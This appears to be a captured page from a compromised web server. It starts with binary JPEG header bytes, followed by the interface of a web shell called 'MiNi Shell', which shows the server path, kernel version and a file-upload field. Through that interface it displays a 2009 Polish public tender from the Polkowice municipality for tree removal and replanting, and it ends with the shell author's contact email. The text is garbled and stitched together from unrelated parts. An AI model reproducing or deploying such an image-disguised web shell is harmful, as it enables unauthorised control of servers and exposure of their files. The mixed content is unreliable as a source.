JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090218/39463-N-2009.html

<p class="kh_header"><b>Polkowice: Wymiana zieleni trwałej</b><br>
<b>Numer ogłoszenia: 39463 - 2009; data zamieszczenia: 18.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Polkowice , Rynek 1, 59-100 Polkowice, woj. dolnośląskie, tel. 076 84 74 121, faks 076 72 46 780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana zieleni trwałej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie dotyczy karczowania drzew rosnących na terenach będących własnością Gminy Polkowice lub będących w zarządzie Gminy Polkowice oraz zastępowania ich nowymi nasadzeniami. Prace będą zlecane i wykonywane na podstawie decyzji wydawanych przez Starostę Polkowickiego oraz wniosków mieszkańców, dotyczących usuwania drzew owocowych.
Zadanie obejmuje: 
a) ścinanie drzew wraz z frezowaniem pniaków: 
odcięcie piłą mechaniczną gałęzi, konarów i części pnia - kłody oraz opuszczenie ich na linach; przewrócenie reszty pnia przy użyciu liny; pocięcie pni i grubych konarów na odcinki dogodne do transportu (ok. 1-1,2 m długości, w nielicznych przypadkach wystąpi konieczność przewiezienia pnia w całości) oraz przewiezienie na odległość do 15 km i wyładowanie na miejsce wskazane przez inspektora nadzoru; rozdrobnienie drobniejszych konarów, gałęzi i pędów za pomocą rębaka wraz z wywiezieniem zrębków na odległość do 5 km na miejsce magazynowania wskazane przez inspektora nadzoru (w przypadku egzemplarzy chorych wywiezienie drobnych gałęzi i pędów na składowisko odpadów wraz z kosztem składowania lub na miejsce wskazane przez inspektor nadzoru); sfrezowanie pniaka na głębokość ok. 20 cm poniżej poziomu gruntu (w przypadku topól zastosowanie herbicydu systemicznego uniemożliwiającego rozwój odrostów korzeniowych);

b) ścinanie drzew wraz z karczowaniem pni:
odcięcie piłą mechaniczną gałęzi, konarów i części pnia - kłody oraz opuszczenie ich na linach; przewrócenie reszty pnia przy użyciu liny; pocięcie pni i grubych konarów na odcinki dogodne do transportu (ok. 1-1,2 m długości, w nielicznych przypadkach wystąpi konieczność przewiezienia pnia w całości) oraz przewiezienie na odległość do 15 km i wyładowanie na miejsce wskazane przez inspektora nadzoru; rozdrobnienie drobniejszych konarów, gałęzi i pędów za pomocą rębaka wraz z wywiezieniem zrębków na odległość do 5 km na miejsce magazynowania wskazane przez inspektora nadzoru (w przypadku egzemplarzy chorych wywiezienie drobnych gałęzi i pędów na składowisko odpadów wraz z kosztem składowania lub na miejsce wskazane przez inspektor nadzoru); odkopanie korzeni wraz z pniakiem; obcięcie i wydobycie korzeni i pniaka z dołu; zasypanie dołu piaskiem i ziemią urodzajną o warstwie 20 cm; ubicie i wyrównanie zasypanego dołu (ubicie każdej warstwy); załadowanie ręczne karpiny na przyczepy; przewiezienie i wyładowanie na składowisko odpadów na odległość do 15 km (wraz z kosztem składowania),
c) ścinanie drzew:
odcięcie piłą mechaniczną gałęzi, konarów i części pnia oraz opuszczenie ich na linach; ścięcie pnia piłą mechaniczną; pocięcie pnia na odcinki dogodne do transportu (ok. 1-1,2 m długości, w nielicznych przypadkach wystąpi konieczność przewiezienia pnia w całości); wywiezienie drewna, pochodzącego z kłody na odległość do 15 km (przekazanie drewna we wskazane przez inspektora nadzoru miejsce); rozdrobnienie drobniejszych konarów, gałęzi i pędów za pomocą rębaka wraz z wywiezieniem zrębków na odległość do 5 km na miejsce magazynowania wskazane przez inspektora nadzoru (w przypadku egzemplarzy chorych, zainfekowanych wywiezienie gałęzi i pędów na składowisko odpadów wraz z kosztem składowania lub na miejsce wskazane przez inspektor nadzoru),
d) ręczne karczowanie pni:
odkopanie korzeni wraz z pniakiem; obcięcie i wydobycie korzeni i pniaka z dołu; zasypanie dołu piaskiem i ziemią urodzajną o warstwie 20 cm; ubicie i wyrównanie zasypanego dołu (ubicie każdej warstwy); załadowanie ręczne karpiny na przyczepy; przewiezienie i wyładowanie na składowisko odpadów na odległość do 15 km (wraz z kosztem składowania),
e) mechaniczne karczowanie pni:
odrąbanie grubych korzeni; wydobycie korzeni i pniaka spycharką; odsunięcie karpiny na odległość do 10 m; zasypanie dołu piaskiem i ziemią urodzajną o warstwie 20 cm; ubicie i wyrównanie zasypanego dołu (ubicie każdej warstwy); załadowanie ręczne karpiny na przyczepę; przewiezienie i wyładowanie na składowisko odpadów na odległość do 15 km (wraz z kosztem składowania).
f) zastępowanie usuniętych drzew nowymi nasadzeniami:
wykopanie dołu o średnicy 50 cm i głębokości 50 cm; umieszczenie (posadzenie) drzewa (gatunek wskazany przez Inspektora)  w dole z całkowitą zaprawą ziemią urodzajną; opalikowanie trzema impregnowanymi, okrągłymi palikami o średnicy 4-5 cm (paliki mają być umocowane do drzewa sznurem parcianym w sposób zarówno estetyczny jak i nie uszkadzający pnia); uformowanie misy; podlanie drzewa po posadzeniu min. 20 l wody; ściółkowanie zrębkami gleby wokół pnia na powierzchni o średnicy 1,5 m (warstwa min. 5 cm); 
Do ceny jednostkowej nie wlicza się jedynie kosztów zakupu drzewa, które będą rozliczane na podstawie faktur zakupu po wcześniejszej konsultacji wysokości tej ceny z inspektorem nadzoru.
g) roczną pielęgnację nasadzonych drzew: 
zgodnie z KNR 2-21 tablica 0701 01. 
W przypadku, gdy drzewo nie zachowa żywotności należy zasadzić nowe, przy czym okres pielęgnacji liczony jest od dnia posadzenia drzewa.
Uwaga: 
Wycinka drzew odbywać się będzie przy zastosowaniu metody alpinistycznej. Dopuszcza się zastosowanie  podnośnika jedynie w około 10% przypadków, kiedy to jego użycie nie będzie groziło zniszczeniem terenów zielonych (trawników, krzewów, chodników itp.) 
Realizacja zadania odbywać się będzie na podstawie protokołów typowania robót spisywanych przez inspektora nadzoru w obecności kierownika robót, w których każdorazowo odnotowany zostanie zakres robót oraz termin wykonania.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.16.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.02.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do udziału w przetargu dopuszczeni zostaną Wykonawcy, którzy:
1.	Spełnią warunki określone w art. 22 ust.1 ustawy.
2.	Spełnią warunki określone w niniejszej specyfikacji.
3.	Spełnią poniższe warunki:
- wykażą  należyte wykonanie, w okresie ostatnich trzech lat przed dniem ogłoszenia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jednej usługi w zakresie wycinek drzew rosnących na terenach miejskich lub terenach zieleni i w parkach wykonanych metodą alpinistyczną (łącznie minimum 30 szt. drzew) z określeniem wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających należyte wykonanie tych usług (np. referencje, protokoły odbioru itp.);
- dysponują lub będą dysponowali minimum dwoma osobami z przeszkoleniem alpinistycznym;
- dysponują lub będą dysponowali rębakiem i frezarką;
- posiadają i przedłożą polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej (deliktowej i kontraktowej) w zakresie prowadzonej działalności na kwotę min. 100.000,00 zł wraz z dowodem uiszczenia należnych składek. Ubezpieczenie powinno być ważne przez cały okres realizacji umowy. W przypadku, kiedy ubezpieczenie będzie wygasać w trakcie realizacji umowy, wykonawca dołączy do oferty oświadczenie, mocą którego zobowiąże się do przedłużenia ubezpieczenia po jego wygaśnięciu.

Ocena spełnienia warunków udziału ma charakter eliminacyjny. Do udziału w postępowaniu dopuszczeni zostaną wykonawcy, którzy spełniają wszystkie warunki udziału w postępowaniu. Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia/nie spełnia na podstawie oświadczenia oraz przedłożonych wraz z ofertą dokumentów wymienionych poniżej.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty potwierdzające spełnienie warunków uczestnictwa w postępowaniu i wymogów specyfikacji:
a)	oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy, o przyjęciu warunków SIWZ,
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c)	pełnomocnictwo wystawione dla osoby składającej ofertę, podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty przez pełnomocnika,
d)	polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej (deliktowej i kontraktowej) w zakresie prowadzonej działalności gospodarczej na kwotę minimum 100.000 zł, wraz z dowodem uiszczenia należnych składek. Ubezpieczenie powinno być ważne przez cały okres realizacji umowy. W przypadku kiedy ubezpieczenie będzie wygasać w trakcie realizacji umowy wykonawca dołączy do oferty oświadczenie, mocą którego zobowiąże się do przedłużenia ubezpieczenia po jego wygaśnięciu;
e)	wykaz  wykonanych w okresie ostatnich trzech lat przed dniem ogłoszenia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, co najmniej jednej usługi w zakresie wycinek drzew rosnących na terenach miejskich lub terenach zieleni i w parkach wykonanych metodą alpinistyczną (łącznie minimum 30 szt. drzew) z określeniem wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających należyte wykonanie tych usług (np. referencje, protokoły odbioru itp.);
f)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca, które będą uczestniczyły w wykonywaniu zamówienia, zawierający co najmniej dwie osoby z przeszkoleniem alpinistycznym wraz z dokumentami potwierdzającymi odbycie takiego szkolenia, 
g)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 12.2.f) Wykonawca wskazał osoby, którymi będzie dysponował,
h)	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje (tytuł prawny do używania np. własność, dzierżawa, najem, leasing, użyczenie itp.) lub będzie dysponował wykonawca: rębaka i frezarki;
i)	pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 12.2. h) Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
Uwaga:
1.	Dokumenty, o których mowa w pkt. 12.2. powinny być przedstawione w formie oryginału lub potwierdzonej za zgodność kserokopii dokumentu.
2.	Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy, lub którzy nie złożyli pełnomocnictw,  lub którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
3.	W przypadku składania oferty przez podmioty występujące wspólnie, dokumenty wymienione w pkt. 12.2 a, b, muszą być złożone przez każdy podmiot. Każdy z podmiotów występujących wspólnie powinien przedłożyć wraz z ofertą aktualną polisę lub inny dokument ubezpieczenia w zakresie prowadzonej działalności gospodarczej, a suma kwot wynikających z tych dokumentów powinna wynosić minimum 100.000 zł.
4.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.
5.	Przedsiębiorcy występujący jako spółka cywilna zobowiązani są do załączenia umowy spółki cywilnej, celem ustalenia osób uprawnionych do reprezentowania spółki.
6.	W przypadku składania oferty przez podmioty występujące wspólnie, do oferty musi być dołączony dokument ustanawiający przez te podmioty wspólnego pełnomocnika.
7.	Wykonawca zobowiązuje się sporządzić umowę konsorcjum po wyborze oferty tj. w okresie między wygraniem przetargu a podpisaniem umowy o zamówienie.
8.	Umowa konsorcyjna musi zawierać:
-	określenie celu gospodarczego,
-	oznaczenie czasu trwania konsorcjum obejmującego okres realizacji przedmiotu zamówienia, gwarancji i rękojmi,
-	wykluczenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia oraz upływu czasu gwarancji i rękojmi,
-	zakaz zmian w umowie bez zgody Zamawiającego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.ug.polkowice.pl/?ID2=przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy, ul. Rynek 1 , 59-100 Polkowice, pok. nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 10:00, miejsce: Urząd Gminy, ul. Rynek 1 , 59-100 Polkowice, Kancelaria - pok. nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com